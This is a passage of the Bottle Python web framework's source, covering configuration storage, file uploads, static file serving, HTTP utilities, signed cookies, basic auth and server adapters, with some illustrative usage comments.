""" A dict-like configuration storage with additional support for
namespaces, validators, meta-data, on_change listeners and more.
"""
__slots__ = ('_meta', '_on_change')
def __init__(self):
self._meta = {}
self._on_change = lambda name, value: None
def load_config(self, filename):
""" Load values from an ``*.ini`` style config file.
If the config file contains sections, their names are used as
namespaces for the values within. The two special sections
``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
"""
conf = ConfigParser()
conf.read(filename)
for section in conf.sections():
for key, value in conf.items(section):
if section not in ('DEFAULT', 'bottle'):
key = section + '.' + key
self[key] = value
return self
def load_dict(self, source, namespace=''):
""" Load values from a dictionary structure. Nesting can be used to
represent namespaces.
>>> c = ConfigDict()
>>> c.load_dict({'some': {'namespace': {'key': 'value'} } })
{'some.namespace.key': 'value'}
"""
for key, value in source.items():
if isinstance(key, str):
nskey = (namespace + '.' + key).strip('.')
if isinstance(value, dict):
self.load_dict(value, namespace=nskey)
else:
self[nskey] = value
else:
raise TypeError('Key has type %r (not a string)' % type(key))
return self
def update(self, *a, **ka):
""" If the first parameter is a string, all keys are prefixed with this
namespace. Apart from that it works just as the usual dict.update().
Example: ``update('some.namespace', key='value')`` """
prefix = ''
if a and isinstance(a[0], str):
prefix = a[0].strip('.') + '.'
a = a[1:]
for key, value in dict(*a, **ka).items():
self[prefix+key] = value
def setdefault(self, key, value):
if key not in self:
self[key] = value
def __setitem__(self, key, value):
if not isinstance(key, str):
raise TypeError('Key has type %r (not a string)' % type(key))
value = self.meta_get(key, 'filter', lambda x: x)(value)
if key in self and self[key] is value:
return
self._on_change(key, value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
self._on_change(key, None)
dict.__delitem__(self, key)
def meta_get(self, key, metafield, default=None):
""" Return the value of a meta field for a key. """
return self._meta.get(key, {}).get(metafield, default)
def meta_set(self, key, metafield, value):
""" Set the meta field for a key to a new value. This triggers the
on-change handler for existing keys. """
self._meta.setdefault(key, {})[metafield] = value
if key in self:
self[key] = self[key]
def meta_list(self, key):
""" Return an iterable of meta field names defined for a key. """
return self._meta.get(key, {}).keys()
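# Example sketch (added for illustration): namespaces and meta data in ConfigDict.
# The 'filter' meta field is the one applied by __setitem__ above.
#
#     c = ConfigDict()
#     c.load_dict({'db': {'host': 'localhost', 'port': 5432}})
#     c['db.host']                         # -> 'localhost'
#     c.meta_set('db.port', 'filter', int)
#     c['db.port'] = '5432'                # stored as the integer 5432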
class AppStack(list):
""" A stack-like list. Calling it returns the head of the stack. """
def __call__(self):
""" Return the current default application. """
return self[-1]
def push(self, value=None):
""" Add a new :class:`Bottle` instance to the stack """
if not isinstance(value, Bottle):
value = Bottle()
self.append(value)
return value
class WSGIFileWrapper(object):
def __init__(self, fp, buffer_size=1024*64):
self.fp, self.buffer_size = fp, buffer_size
for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))
def __iter__(self):
buff, read = self.buffer_size, self.read
while True:
part = read(buff)
if not part: return
yield part
class _closeiter(object):
""" This only exists to be able to attach a .close method to iterators that
do not support attribute assignment (most of itertools). """
def __init__(self, iterator, close=None):
self.iterator = iterator
self.close_callbacks = makelist(close)
def __iter__(self):
return iter(self.iterator)
def close(self):
for func in self.close_callbacks:
func()
class ResourceManager(object):
""" This class manages a list of search paths and helps to find and open
application-bound resources (files).
:param base: default value for :meth:`add_path` calls.
:param opener: callable used to open resources.
:param cachemode: controls which lookups are cached. One of 'all',
'found' or 'none'.
"""
def __init__(self, base='./', opener=open, cachemode='all'):
self.opener = opener
self.base = base
self.cachemode = cachemode
#: A list of search paths. See :meth:`add_path` for details.
self.path = []
#: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
self.cache = {}
def add_path(self, path, base=None, index=None, create=False):
""" Add a new path to the list of search paths. Return False if the
path does not exist.
:param path: The new search path. Relative paths are turned into
an absolute and normalized form. If the path looks like a file
(not ending in `/`), the filename is stripped off.
:param base: Path used to absolutize relative search paths.
Defaults to :attr:`base` which defaults to ``os.getcwd()``.
:param index: Position within the list of search paths. Defaults
to last index (appends to the list).
The `base` parameter makes it easy to reference files installed
along with a python module or package::
res.add_path('./resources/', __file__)
"""
base = os.path.abspath(os.path.dirname(base or self.base))
path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
path += os.sep
if path in self.path:
self.path.remove(path)
if create and not os.path.isdir(path):
os.makedirs(path)
if index is None:
self.path.append(path)
else:
self.path.insert(index, path)
self.cache.clear()
return os.path.exists(path)
def __iter__(self):
""" Iterate over all existing files in all registered paths. """
search = self.path[:]
while search:
path = search.pop()
if not os.path.isdir(path): continue
for name in os.listdir(path):
full = os.path.join(path, name)
if os.path.isdir(full): search.append(full)
else: yield full
def lookup(self, name):
""" Search for a resource and return an absolute file path, or `None`.
The :attr:`path` list is searched in order. The first match is
        returned. Symlinks are followed. The result is cached to speed up
future lookups. """
if name not in self.cache or DEBUG:
for path in self.path:
fpath = os.path.join(path, name)
if os.path.isfile(fpath):
if self.cachemode in ('all', 'found'):
self.cache[name] = fpath
return fpath
if self.cachemode == 'all':
self.cache[name] = None
return self.cache[name]
def open(self, name, mode='r', *args, **kwargs):
""" Find a resource and return a file object, or raise IOError. """
fname = self.lookup(name)
if not fname: raise IOError("Resource %r not found." % name)
return self.opener(fname, mode=mode, *args, **kwargs)
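# Usage sketch (added for illustration, not part of the original source): using
# ResourceManager to find files shipped next to a module; the './data/' folder
# and 'defaults.json' name are assumptions.
#
#     res = ResourceManager()
#     res.add_path('./data/', base=__file__)
#     if res.lookup('defaults.json'):
#         with res.open('defaults.json') as fp:
#             defaults = fp.read()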
class FileUpload(object):
def __init__(self, fileobj, name, filename, headers=None):
""" Wrapper for file uploads. """
#: Open file(-like) object (BytesIO buffer or temporary file)
self.file = fileobj
#: Name of the upload form field
self.name = name
#: Raw filename as sent by the client (may contain unsafe characters)
self.raw_filename = filename
#: A :class:`HeaderDict` with additional headers (e.g. content-type)
self.headers = HeaderDict(headers) if headers else HeaderDict()
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int, default=-1)
@cached_property
def filename(self):
""" Name of the file on the client file system, but normalized to ensure
file system compatibility. An empty filename is returned as 'empty'.
Only ASCII letters, digits, dashes, underscores and dots are
allowed in the final filename. Accents are removed, if possible.
            Whitespace is replaced by a single dash. Leading or trailing dots
or dashes are removed. The filename is limited to 255 characters.
"""
fname = self.raw_filename
if not isinstance(fname, unicode):
fname = fname.decode('utf8', 'ignore')
fname = normalize('NFKD', fname).encode('ASCII', 'ignore').decode('ASCII')
fname = os.path.basename(fname.replace('\\', os.path.sep))
fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip()
fname = re.sub(r'[-\s]+', '-', fname).strip('.-')
return fname[:255] or 'empty'
def _copy_file(self, fp, chunk_size=2**16):
read, write, offset = self.file.read, fp.write, self.file.tell()
while 1:
buf = read(chunk_size)
if not buf: break
write(buf)
self.file.seek(offset)
def save(self, destination, overwrite=False, chunk_size=2**16):
""" Save file to disk or copy its content to an open file(-like) object.
If *destination* is a directory, :attr:`filename` is added to the
path. Existing files are not overwritten by default (IOError).
:param destination: File path, directory or file(-like) object.
:param overwrite: If True, replace existing files. (default: False)
:param chunk_size: Bytes to read at a time. (default: 64kb)
"""
if isinstance(destination, basestring): # Except file-likes here
if os.path.isdir(destination):
destination = os.path.join(destination, self.filename)
if not overwrite and os.path.exists(destination):
raise IOError('File exists.')
with open(destination, 'wb') as fp:
self._copy_file(fp, chunk_size)
else:
self._copy_file(destination, chunk_size)
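# Usage sketch (added for illustration, not part of the original source):
# FileUpload objects are normally obtained from ``request.files`` inside a
# route; the 'datafile' field name and '/tmp/uploads' directory are placeholders.
#
#     @route('/upload', method='POST')
#     def do_upload():
#         upload = request.files.get('datafile')
#         upload.save('/tmp/uploads')  # a directory: upload.filename is appended
#         return 'Saved as %s' % upload.filename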
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
""" Aborts execution and causes a HTTP error. """
raise HTTPError(code, text)
def redirect(url, code=None):
""" Aborts execution and causes a 303 or 302 redirect, depending on
the HTTP protocol version. """
if not code:
code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
res = response.copy(cls=HTTPResponse)
res.status = code
res.body = ""
res.set_header('Location', urljoin(request.url, url))
raise res
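# Usage sketch (added for illustration, not part of the original source):
# abort() and redirect() inside route callbacks; the paths and the
# ``item_exists`` helper are hypothetical.
#
#     @route('/item/<item_id:int>')
#     def show_item(item_id):
#         if not item_exists(item_id):  # hypothetical lookup helper
#             abort(404, 'No such item.')
#         return 'Item %d' % item_id
#
#     @route('/old-location')
#     def old_location():
#         redirect('/item/1')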
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
""" Yield chunks from a range in a file. No chunk is bigger than maxread."""
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
""" Open a file in a safe way and return :exc:`HTTPResponse` with status
        code 200, 304, 403 or 404. The ``Content-Type``, ``Content-Encoding``,
``Content-Length`` and ``Last-Modified`` headers are set if possible.
Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
requests.
:param filename: Name or path of the file to send.
:param root: Root path for file lookups. Should be an absolute directory
path.
:param mimetype: Defines the content-type header (default: guess from
file extension)
:param download: If True, ask the browser to open a `Save as...` dialog
instead of opening the file with the associated program. You can
specify a custom filename as a string. If not specified, the
original filename is used (default: False).
:param charset: The charset to use for files with a ``text/*``
mime-type. (default: UTF-8)
"""
root = os.path.abspath(root) + os.sep
filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
headers = dict()
if not filename.startswith(root):
return HTTPError(403, "Access denied.")
if not os.path.exists(filename) or not os.path.isfile(filename):
return HTTPError(404, "File does not exist.")
if not os.access(filename, os.R_OK):
return HTTPError(403, "You do not have permission to access this file.")
if mimetype == 'auto':
mimetype, encoding = mimetypes.guess_type(filename)
if encoding: headers['Content-Encoding'] = encoding
if mimetype:
if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
mimetype += '; charset=%s' % charset
headers['Content-Type'] = mimetype
if download:
download = os.path.basename(filename if download == True else download)
headers['Content-Disposition'] = 'attachment; filename="%s"' % download
stats = os.stat(filename)
headers['Content-Length'] = clen = stats.st_size
lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
headers['Last-Modified'] = lm
ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
if ims:
ims = parse_date(ims.split(";")[0].strip())
if ims is not None and ims >= int(stats.st_mtime):
headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
return HTTPResponse(status=304, **headers)
body = '' if request.method == 'HEAD' else open(filename, 'rb')
headers["Accept-Ranges"] = "bytes"
ranges = request.environ.get('HTTP_RANGE')
if 'HTTP_RANGE' in request.environ:
ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
headers["Content-Length"] = str(end-offset)
if body: body = _file_iter_range(body, offset, end-offset)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
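# Usage sketch (added for illustration, not part of the original source):
# serving files from a dedicated directory; '/path/to/static' is a placeholder.
#
#     @route('/static/<filepath:path>')
#     def serve_static(filepath):
#         return static_file(filepath, root='/path/to/static')
#
#     @route('/download/<filename>')
#     def download(filename):
#         return static_file(filename, root='/path/to/static', download=True)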
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
""" Change the debug level.
There is only one debug level supported at the moment."""
global DEBUG
if mode: warnings.simplefilter('default')
DEBUG = bool(mode)
def http_date(value):
if isinstance(value, (datedate, datetime)):
value = value.utctimetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
if not isinstance(value, basestring):
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
return value
def parse_date(ims):
""" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
try:
ts = email.utils.parsedate_tz(ims)
return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone
except (TypeError, ValueError, IndexError, OverflowError):
return None
def parse_auth(header):
""" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
try:
method, data = header.split(None, 1)
if method.lower() == 'basic':
user, pwd = touni(base64.b64decode(tob(data))).split(':',1)
return user, pwd
except (KeyError, ValueError):
return None
def parse_range_header(header, maxlen=0):
""" Yield (start, end) ranges parsed from a HTTP Range header. Skip
unsatisfiable ranges. The end index is non-inclusive."""
if not header or header[:6] != 'bytes=': return
ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]
for start, end in ranges:
try:
if not start: # bytes=-100 -> last 100 bytes
start, end = max(0, maxlen-int(end)), maxlen
            elif not end:   # bytes=100-    -> all but the first 100 bytes
start, end = int(start), maxlen
else: # bytes=100-200 -> bytes 100-200 (inclusive)
start, end = int(start), min(int(end)+1, maxlen)
if 0 <= start < end <= maxlen:
yield start, end
except ValueError:
pass
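# Worked example (added for illustration, not part of the original source): how
# parse_range_header() interprets a Range header for a 1000-byte resource.
#
#     list(parse_range_header('bytes=0-499,500-999', 1000))
#     # -> [(0, 500), (500, 1000)]   (end indices are non-inclusive)
#     list(parse_range_header('bytes=-100', 1000))
#     # -> [(900, 1000)]             (the last 100 bytes)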
def _parse_qsl(qs):
r = []
for pair in qs.replace(';','&').split('&'):
if not pair: continue
nv = pair.split('=', 1)
if len(nv) != 2: nv.append('')
key = urlunquote(nv[0].replace('+', ' '))
value = urlunquote(nv[1].replace('+', ' '))
r.append((key, value))
return r
def _lscmp(a, b):
""" Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. """
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
""" Encode and sign a pickle-able object. Return a (byte) string """
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg).digest())
return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
""" Verify and decode an encoded string. Return an object or None."""
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())):
return pickle.loads(base64.b64decode(msg))
return None
def cookie_is_encoded(data):
""" Return True if the argument looks like a encoded cookie."""
return bool(data.startswith(tob('!')) and tob('?') in data)
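# Usage sketch (added for illustration, not part of the original source): a
# signed-cookie round trip; 'secret-key' is a placeholder.
#
#     token = cookie_encode({'user': 'alice'}, 'secret-key')
#     cookie_is_encoded(token)            # -> True
#     cookie_decode(token, 'secret-key')  # -> {'user': 'alice'}
#     cookie_decode(token, 'wrong-key')   # -> None (signature mismatch)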
def html_escape(string):
""" Escape HTML special characters ``&<>`` and quotes ``'"``. """
    return string.replace('&','&amp;').replace('<','&lt;').replace('>','&gt;')\
                 .replace('"','&quot;').replace("'",'&#039;')
def html_quote(string):
""" Escape and quote a string to be used as an HTTP attribute."""
return '"%s"' % html_escape(string).replace('\n',' ')\
.replace('\r',' ').replace('\t','	')
def yieldroutes(func):
""" Return a generator for routes that match the signature (name, args)
of the func parameter. This may yield more than one route if the function
takes optional keyword arguments. The output is best described by example::
a() -> '/a'
b(x, y) -> '/b/<x>/<y>'
c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>'
d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
"""
path = '/' + func.__name__.replace('__','/').lstrip('/')
spec = getargspec(func)
argc = len(spec[0]) - len(spec[3] or [])
path += ('/<%s>' * argc) % tuple(spec[0][:argc])
yield path
for arg in spec[0][argc:]:
path += '/<%s>' % arg
yield path
def path_shift(script_name, path_info, shift=1):
""" Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.
:return: The modified paths.
:param script_name: The SCRIPT_NAME path.
        :param path_info: The PATH_INFO path.
:param shift: The number of path fragments to shift. May be negative to
change the shift direction. (default: 1)
"""
if shift == 0: return script_name, path_info
pathlist = path_info.strip('/').split('/')
scriptlist = script_name.strip('/').split('/')
if pathlist and pathlist[0] == '': pathlist = []
if scriptlist and scriptlist[0] == '': scriptlist = []
if 0 < shift <= len(pathlist):
moved = pathlist[:shift]
scriptlist = scriptlist + moved
pathlist = pathlist[shift:]
elif 0 > shift >= -len(scriptlist):
moved = scriptlist[shift:]
pathlist = moved + pathlist
scriptlist = scriptlist[:shift]
else:
empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
raise AssertionError("Cannot shift. Nothing left from %s" % empty)
new_script_name = '/' + '/'.join(scriptlist)
new_path_info = '/' + '/'.join(pathlist)
if path_info.endswith('/') and pathlist: new_path_info += '/'
return new_script_name, new_path_info
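# Worked example (added for illustration, not part of the original source):
# shifting one fragment from PATH_INFO to SCRIPT_NAME, as done when mounting
# sub-applications.
#
#     path_shift('/app', '/api/items', shift=1)
#     # -> ('/app/api', '/items')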
def auth_basic(check, realm="private", text="Access denied"):
""" Callback decorator to require HTTP auth (basic).
TODO: Add route(check_auth=...) parameter. """
def decorator(func):
@functools.wraps(func)
def wrapper(*a, **ka):
user, password = request.auth or (None, None)
if user is None or not check(user, password):
err = HTTPError(401, text)
err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
return err
return func(*a, **ka)
return wrapper
return decorator
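# Usage sketch (added for illustration, not part of the original source):
# protecting a route with HTTP basic auth; ``check_credentials`` is a
# hypothetical verification callback.
#
#     def check_credentials(user, password):  # hypothetical
#         return user == 'admin' and password == 's3cret'
#
#     @route('/admin')
#     @auth_basic(check_credentials, realm='admin area')
#     def admin_page():
#         return 'Welcome, admin.'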
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
""" Return a callable that relays calls to the current default app. """
@functools.wraps(getattr(Bottle, name))
def wrapper(*a, **ka):
return getattr(app(), name)(*a, **ka)
return wrapper
route = make_default_app_wrapper('route')
get = make_default_app_wrapper('get')
post = make_default_app_wrapper('post')
put = make_default_app_wrapper('put')
delete = make_default_app_wrapper('delete')
patch = make_default_app_wrapper('patch')
error = make_default_app_wrapper('error')
mount = make_default_app_wrapper('mount')
hook = make_default_app_wrapper('hook')
install = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url = make_default_app_wrapper('get_url')
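# Usage sketch (added for illustration, not part of the original source): the
# shortcuts above act on the current default application, so a minimal app
# needs no explicit Bottle() instance.
#
#     @get('/hello/<name>')
#     def hello(name):
#         return 'Hello %s!' % name
#
#     # run(host='localhost', port=8080)  # see run() further below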
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
quiet = False
def __init__(self, host='127.0.0.1', port=8080, **options):
self.options = options
self.host = host
self.port = int(port)
def run(self, handler): # pragma: no cover
pass
def __repr__(self):
args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()])
return "%s(%s)" % (self.__class__.__name__, args)
class CGIServer(ServerAdapter):
quiet = True
def run(self, handler): # pragma: no cover
from wsgiref.handlers import CGIHandler
def fixed_environ(environ, start_response):
environ.setdefault('PATH_INFO', '')
return handler(environ, start_response)
CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
def run(self, handler): # pragma: no cover
import flup.server.fcgi
self.options.setdefault('bindAddress', (self.host, self.port))
flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import make_server
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
self.srv = make_server(self.host, self.port, app, server_cls, handler_cls)
        self.port = self.srv.server_port # update to the actual port (0 means a random port)
try:
self.srv.serve_forever()
except KeyboardInterrupt:
self.srv.server_close() # Prevent ResourceWarning: unclosed socket
raise
class CherryPyServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from cherrypy import wsgiserver
self.options['bind_addr'] = (self.host, self.port)
self.options['wsgi_app'] = handler
certfile = self.options.get('certfile')
if certfile:
del self.options['certfile']
keyfile = self.options.get('keyfile')
if keyfile:
del self.options['keyfile']
server = wsgiserver.CherryPyWSGIServer(**self.options)
if certfile:
server.ssl_certificate = certfile
if keyfile:
server.ssl_private_key = keyfile
try:
server.start()
finally:
server.stop()
class WaitressServer(ServerAdapter):
def run(self, handler):
from waitress import serve
serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from paste import httpserver
from paste.translogger import TransLogger
handler = TransLogger(handler, setup_console_handler=(not self.quiet))
httpserver.serve(handler, host=self.host, port=str(self.port),
**self.options)
class MeinheldServer(ServerAdapter):
def run(self, handler):
from meinheld import server
server.listen((self.host, self.port))
server.run(handler)
class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
def run(self, handler): # pragma: no cover
import fapws._evwsgi as evwsgi
from fapws import base, config
port = self.port
if float(config.SERVER_IDENT[-2:]) > 0.4:
# fapws3 silently changed its API in 0.5
port = str(port)
evwsgi.start(self.host, port)
# fapws3 never releases the GIL. Complain upstream. I tried. No luck.
if 'BOTTLE_CHILD' in os.environ and not self.quiet:
_stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
_stderr(" (Fapws3 breaks python thread support)\n")
evwsgi.set_base_module(base)
def app(environ, start_response):
environ['wsgi.multiprocess'] = False
return handler(environ, start_response)
evwsgi.wsgi_cb(('', app))
evwsgi.run()
class TornadoServer(ServerAdapter):
""" The super hyped asynchronous server by facebook. Untested. """
def run(self, handler): # pragma: no cover
import tornado.wsgi, tornado.httpserver, tornado.ioloop
container = tornado.wsgi.WSGIContainer(handler)
server = tornado.httpserver.HTTPServer(container)
server.listen(port=self.port,address=self.host)
tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
""" Adapter for Google App Engine. """
quiet = True
def run(self, handler):
from google.appengine.ext.webapp import util
# A main() function in the handler script enables 'App Caching'.
        # Let's make sure it is there. This _really_ improves performance.
module = sys.modules.get('__main__')
if module and not hasattr(module, 'main'):
module.main = lambda: util.run_wsgi_app(handler)
util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from twisted.web import server, wsgi
from twisted.python.threadpool import ThreadPool
from twisted.internet import reactor
thread_pool = ThreadPool()
thread_pool.start()
reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
reactor.listenTCP(self.port, factory, interface=self.host)
if not reactor.running:
reactor.run()
class DieselServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from diesel.protocols.wsgi import WSGIApplication
app = WSGIApplication(handler, port=self.port)
app.run()
class GeventServer(ServerAdapter):
""" Untested. Options:
* `fast` (default: False) uses libevent's http server, but has some
issues: No streaming, no pipelining, no SSL.
* See gevent.wsgi.WSGIServer() documentation for more options.
"""
def run(self, handler):
from gevent import wsgi, pywsgi, local
if not isinstance(threading.local(), local.local):
msg = "Bottle requires gevent.monkey.patch_all() (before import)"
raise RuntimeError(msg)
if not self.options.pop('fast', None): wsgi = pywsgi
self.options['log'] = None if self.quiet else 'default'
address = (self.host, self.port)
server = wsgi.WSGIServer(address, handler, **self.options)
if 'BOTTLE_CHILD' in os.environ:
import signal
signal.signal(signal.SIGINT, lambda s, f: server.stop())
server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
def run(self,handler):
from socketio import server
address = (self.host, self.port)
server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
""" Untested. See http://gunicorn.org/configure.html for options. """
def run(self, handler):
from gunicorn.app.base import Application
config = {'bind': "%s:%d" % (self.host, int(self.port))}
config.update(self.options)
class GunicornApplication(Application):
def init(self, parser, opts, args):
return config
def load(self):
return handler
GunicornApplication().run()
class EventletServer(ServerAdapter):
""" Untested. Options:
* `backlog` adjust the eventlet backlog parameter which is the maximum
number of queued connections. Should be at least 1; the maximum
value is system-dependent.
* `family`: (default is 2) socket family, optional. See socket
documentation for available families.
"""
def run(self, handler):
from eventlet import wsgi, listen, patcher
if not patcher.is_monkey_patched(os):
msg = "Bottle requires eventlet.monkey_patch() (before import)"
raise RuntimeError(msg)
socket_args = {}
for arg in ('backlog', 'family'):
try:
socket_args[arg] = self.options.pop(arg)
except KeyError:
pass
address = (self.host, self.port)
try:
wsgi.server(listen(address, **socket_args), handler,
log_output=(not self.quiet))
except TypeError:
# Fallback, if we have old version of eventlet
wsgi.server(listen(address), handler)
class RocketServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from rocket import Rocket
server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
server.start()
class BjoernServer(ServerAdapter):
""" Fast server written in C: https://github.com/jonashaag/bjoern """
def run(self, handler):
from bjoern import run
run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
""" Untested. """
adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
def run(self, handler):
for sa in self.adapters:
try:
return sa(self.host, self.port, **self.options).run(handler)
except ImportError:
pass
server_names = {
'cgi': CGIServer,
'flup': FlupFCGIServer,
'wsgiref': WSGIRefServer,
'waitress': WaitressServer,
'cherrypy': CherryPyServer,
'paste': PasteServer,
'fapws3': FapwsServer,
'tornado': TornadoServer,
'gae': AppEngineServer,
'twisted': TwistedServer,
'diesel': DieselServer,
'meinheld': MeinheldServer,
'gunicorn': GunicornServer,
'eventlet': EventletServer,
'gevent': GeventServer,
'geventSocketIO':GeventSocketIOServer,
'rocket': RocketServer,
'bjoern' : BjoernServer,
'auto': AutoServer,
}
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
""" Import a module or fetch an object from a module.
* ``package.module`` returns `module` as a module object.
* ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
* ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.
The last form accepts not only function calls, but any type of
expression. Keyword arguments passed to this function are available as
        local variables. Example: ``load('re:compile(x)', x='[a-z]')``
"""
module, target = target.split(":", 1) if ':' in target else (target, None)
if module not in sys.modules: __import__(module)
if not target: return sys.modules[module]
if target.isalnum(): return getattr(sys.modules[module], target)
package_name = module.split('.')[0]
namespace[package_name] = sys.modules[package_name]
return eval('%s.%s' % (module, target), namespace)
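# Usage sketch (added for illustration, not part of the original source): the
# three target forms accepted by load(); 'mypackage' and 'make_app' are
# placeholders.
#
#     load('mypackage.views')             # the module object itself
#     load('mypackage.views:make_app')    # an attribute of that module
#     load('mypackage.views:make_app()')  # the result of calling it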
def load_app(target):
""" Load a bottle application from a module and make sure that the import
does not affect the current default application, but returns a separate
application object. See :func:`load` for the target parameter. """
global NORUN; NORUN, nr_old = True, NORUN
tmp = default_app.push() # Create a new "default application"
try:
rv = load(target) # Import the target module
return rv if callable(rv) else tmp
finally:
default_app.remove(tmp) # Remove the temporary added default application
NORUN = nr_old
_debug = debug
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
interval=1, reloader=False, quiet=False, plugins=None,
debug=None, **kargs):
""" Start a server instance. This method blocks until the server terminates.
:param app: WSGI application or target string supported by
:func:`load_app`. (default: :func:`default_app`)
:param server: Server adapter to use. See :data:`server_names` keys
for valid names or pass a :class:`ServerAdapter` subclass.
(default: `wsgiref`)
        :param host: Server address to bind to. Pass ``0.0.0.0`` to listen on
all interfaces including the external one. (default: 127.0.0.1)
:param port: Server port to bind to. Values below 1024 require root
privileges. (default: 8080)
:param reloader: Start auto-reloading server? (default: False)
:param interval: Auto-reloader interval in seconds (default: 1)
:param quiet: Suppress output to stdout and stderr? (default: False)
:param options: Options passed to the server adapter.
"""
if NORUN: return
if reloader and not os.environ.get('BOTTLE_CHILD'):
lockfile = None
try:
fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
os.close(fd) # We only need this file to exist. We never write to it
while os.path.exists(lockfile):
args = [sys.executable] + sys.argv
environ = os.environ.copy()
environ['BOTTLE_CHILD'] = 'true'
environ['BOTTLE_LOCKFILE'] = lockfile
p = subprocess.Popen(args, env=environ)
while p.poll() is None: # Busy wait...
os.utime(lockfile, None) # I am alive!
time.sleep(interval)
if p.poll() != 3:
if os.path.exists(lockfile): os.unlink(lockfile)
sys.exit(p.poll())
except KeyboardInterrupt:
pass
finally:
if os.path.exists(lockfile):
os.unlink(lockfile)
return
try:
if debug is not None: _debug(debug)
app = app or default_app()
if isinstance(app, basestring):
app = load_app(app)
if not callable(app):
raise ValueError("Application is not callable: %r" % app)
for plugin in plugins or []:
if isinstance(plugin, basestring):
plugin = load(plugin)
app.install(plugin)
if server in server_names:
server = server_names.get(server)
if isinstance(server, basestring):
server = load(server)
if isinstance(server, type):
server = server(host=host, port=port, **kargs)
if not isinstance(server, ServerAdapter):
raise ValueError("Unknown or unsupported server: %r" % server)
server.quiet = server.quiet or quiet
if not server.quiet:
_stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
_stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
_stderr("Hit Ctrl-C to quit.\n\n")
if reloader:
lockfile = os.environ.get('BOTTLE_LOCKFILE')
